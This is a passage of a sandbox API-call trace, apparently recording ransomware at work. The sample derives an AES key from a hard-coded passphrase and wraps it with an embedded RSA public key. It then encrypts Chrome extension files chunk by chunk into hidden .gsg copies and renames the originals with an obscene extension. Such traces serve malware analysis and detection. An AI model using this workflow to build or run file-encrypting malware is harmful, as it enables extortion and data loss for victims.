[0261.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.253] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.254] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0xaa, lpOverlapped=0x0) returned 1 [0261.254] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xaa, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xb0) returned 1 [0261.254] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0xb0, lpOverlapped=0x0) returned 1 [0261.254] CloseHandle (hObject=0x5d50) returned 1 [0261.254] CloseHandle (hObject=0x5d64) returned 1 [0261.254] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), bFailIfExists=0) returned 1 [0261.258] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js", dwFileAttributes=0x0) returned 1 [0261.259] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.gsg")) returned 1 [0261.260] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.fuck")) returned 1 [0261.261] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.261] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.261] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.262] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.262] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.262] GetLastError () returned 0x0 [0261.262] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html")) returned 0x20 [0261.263] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html", dwFileAttributes=0x80) returned 1 [0261.263] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.264] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.265] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg", dwFileAttributes=0x2) returned 1 [0261.265] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.267] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.267] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.267] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.267] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.267] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.267] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.267] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e72690) returned 1 [0261.267] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72690, dwCertEncodingType=0x1, pInfo=0x2eabd60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eabd90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eabd98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7df00) returned 1 [0261.267] CryptEncrypt (in: hKey=0x2e7df00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.268] CryptEncrypt (in: hKey=0x2e7df00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e719d0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e719d0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.268] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e719d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e719d0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.268] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.276] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.276] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.290] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.290] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.290] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.290] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.290] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.290] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.290] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.290] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.291] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.291] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.291] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.291] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.291] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.291] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.292] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.292] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.292] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.292] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.292] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.293] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.293] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.293] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.293] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.293] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.293] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.293] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.293] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.294] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.294] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.294] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.294] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: 